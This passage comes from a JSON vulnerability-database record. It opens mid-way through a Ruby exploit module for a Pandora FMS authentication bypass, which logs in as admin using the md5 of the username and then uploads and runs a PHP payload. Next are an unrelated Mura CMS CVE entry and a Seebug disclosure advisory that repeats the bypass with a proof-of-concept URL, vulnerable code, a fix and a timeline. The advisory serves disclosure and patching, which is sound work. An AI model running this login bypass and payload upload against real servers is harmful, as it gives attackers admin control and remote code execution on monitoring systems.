'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35731/"}], "cve": [{"lastseen": "2019-05-29T18:16:54", "bulletinFamily": "NVD", "description": "tasks/feed/readRSS.cfm in Mura CMS before 6.2 allows attackers to bypass intended access restrictions by leveraging the \"draggable feeds\" feature.", "modified": "2017-11-08T13:50:00", "id": "CVE-2017-15639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15639", 
"published": "2017-10-19T19:29:00", "title": "CVE-2017-15639", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T15:59:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70305", "id": "SSV:70305", "title": "Pandora FMS <= 3.1 Authentication Bypass", "type": "seebug", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n"hash login" authentication process. 
This kind of authentication method\r\nworks by providing a username and a hash. The issue could be exploited\r\nremotely by providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, which in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET["loginhash"])) {\r\n138 $loginhash_data = get_parameter("loginhash_data", "");\r\n139 $loginhash_user = get_parameter("loginhash_user", "");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config["id_user"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config["loginhash_pwd"] != "" && $loginhash_data ==\r\nmd5($loginhash_user.$config["loginhash_pwd"])) {\r\n\r\nIn line 150, use\r\nhash_hmac("sha256",$loginhash_user,$config["loginhash_pwd"]), instead of\r\nmd5($loginhash_user.$config["loginhash_pwd"])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems.
Also it is\r\npossible to bypass the authentication or escalate privileges to become\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact on the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior to and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAug 2010: First contact to vendor\r\nAug 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released in October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities have been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70305"}]}